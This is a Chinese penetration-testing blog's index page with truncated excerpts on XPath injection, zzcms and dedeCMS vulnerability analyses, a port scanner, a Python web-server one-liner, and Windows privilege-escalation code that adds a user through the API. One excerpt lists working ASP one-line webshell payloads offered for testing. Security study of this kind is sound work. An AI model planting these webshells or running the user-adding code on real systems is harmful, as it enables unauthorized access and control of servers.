热门 XPath注入详解

时间:2017-2-15   作者:webbaozi   分类: 小技巧   热度:1389°    
时间:2017-2-15   分类: 小技巧    热度:1389  
0x01 简介 XPath注入攻击是指利用XPath 解析器的松散输入和容错特性,能够在 URL、表单或其它信息上附带恶意的XPath 查询代码,以获得权限信息的访问权并更改这些信息。XPath注入发生在当站点使用用户输入的信息来构造请求以获取XML数据。攻击者对站点发送经过特殊构造的信息来探究站点使用的XML是如何构造的,从而进一步获取正常途径下无法获取的数据。当XML数据被用作账户验证时,攻击者还可以提升他的权限。 0x02 原理 XPath 注入的原理与sql注入大体类似。主要是通过构建特殊的输入,这些输入往往是XPath语法中的一些组合,这些输入将作...

阅读全文>>

热门 【收集】一句话脚本

时间:2017-2-12   作者:webbaozi   分类: 个人笔记   热度:909°    
时间:2017-2-12   分类: 个人笔记    热度:909  
只是收集,并没有逐个测试可用性,请自行测试,谢谢:)! asp一句话  <%execute(request("webbaozi"))%> <%eval request("webbaozi")%> <%eval(Request.Item["webbaozi"],"unsafe");%> <SCRIPT language=VBScript runat="server">execute request("webbaozi")</SCRIPT> <% Function...

阅读全文>>

热门 zzcms user/logincheck.php SQL注入

时间:2017-2-9   作者:webbaozi   分类: 代码审计   热度:1192°    
时间:2017-2-9   分类: 代码审计    热度:1192  
今天没事看了下 https://www.seebug.org/vuldb/ssvid-92628 https://www.seebug.org/vuldb/ssvid-92658 没有放出poc,自己动手。 第一个登录注入复现成功,但是第二个,始终绕不过。 登录地址:zzcms.com/user/login.php 登录成功会记录最后登录的ip地址 跟进获取ip函数 文件:inc/fuction.php function getip(){ if (getenv...

阅读全文>>

热门 网络资产信息快速收集F-NAScan

时间:2017-2-8   作者:webbaozi   分类: 安全工具   热度:836°    
时间:2017-2-8   分类: 安全工具    热度:836  
网络资产信息扫描:     在渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口,端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:         1、轻巧简洁,只需python环境,无需安装额外外库。         2、扫描完成后生成独立页面报告。 此脚本的大概流程为 IC...

阅读全文>>

热门 dedeCMS友情链接getshell漏洞分析

时间:2017-1-23   作者:webbaozi   分类: 代码审计   热度:1092°    
时间:2017-1-23   分类: 代码审计    热度:1092  
在tpl.php中 /*--------------------------- function savetagfile() { } 保存标签碎片修改 --------------------------*/ else if($action=='savetagfile') { if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename)) { ShowMsg('文件名不合法,不允许进行操作!', '-1'); exit(); } require_on...

阅读全文>>

热门 无net添加用户(即api添加用户)

时间:2017-1-21   作者:webbaozi   分类: 安全工具   热度:1328°    
时间:2017-1-21   分类: 安全工具    热度:1328  
无net提权(纯API添加用户) 就是net.exe net1.exe被删除时调用api添加用户 之前就看到别人发过这种工具,但是自己还是鼓捣一下:)! 使用vs2015编译。 添加用户账号:webbaozi 用户密码:[email protected]#123 代码: #pragma comment(lib, "Netapi32.lib") #include "stdafx.h" #include <Windows.h> #include <Lm.h> int main() { NET_A...

阅读全文>>

热门 一句Python命令启动一个Web服务器

时间:2017-1-15   作者:webbaozi   分类: 个人笔记   热度:653°    
时间:2017-1-15   分类: 个人笔记    热度:653  
利用Python自带的包可以建立简单的web服务器。在DOS里cd到准备做服务器根目录的路径下,输入命令: python -m Web服务器模块 [端口号,默认8000] 例如: python -m SimpleHTTPServer 8080 然后就可以在浏览器中输入 http://localhost:端口号/路径 来访问服务器资源。 例如: http://localhost:8080/index.htm(当然index.htm文件得自己创建) 其它机器也可以通过服务器的IP地址来访问。 这里的“Web服务器模块”有如下三种: ...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1